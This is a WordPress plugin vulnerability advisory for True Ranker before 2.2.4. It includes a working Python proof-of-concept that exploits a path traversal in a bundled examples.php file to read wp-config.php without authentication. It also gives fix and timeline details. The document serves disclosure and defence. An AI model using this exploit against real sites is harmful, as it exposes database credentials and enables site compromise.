WordPress Plugin Vulnerabilities
True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
Description
The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
Proof of Concept
# Exploit Authors: Nicole Sheinin, Liad Levy
# Tested on: MacOS
#!/usr/bin/env python3
import argparse, textwrap
import requests
import sys
parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)
group_must = parser.add_argument_group('must arguments')
group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True)
parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False)
args = parser.parse_args()
if len(sys.argv) <= 2:
print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
sys.exit()
HOST = args.url
PAYLOAD = args.payload
url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
payload = "/scripts/simple.php/{}".format(PAYLOAD)
r = requests.post(url,data={'src': payload})
if r.status_code == 200:
print(r.text)
else:
print("No exploit found")
Affects Plugins
Fixed in 2.2.4 References
Classification
Type
TRAVERSAL
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
p7e4
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-14 (about 2 years ago)
Added
2021-12-15 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
WPScan 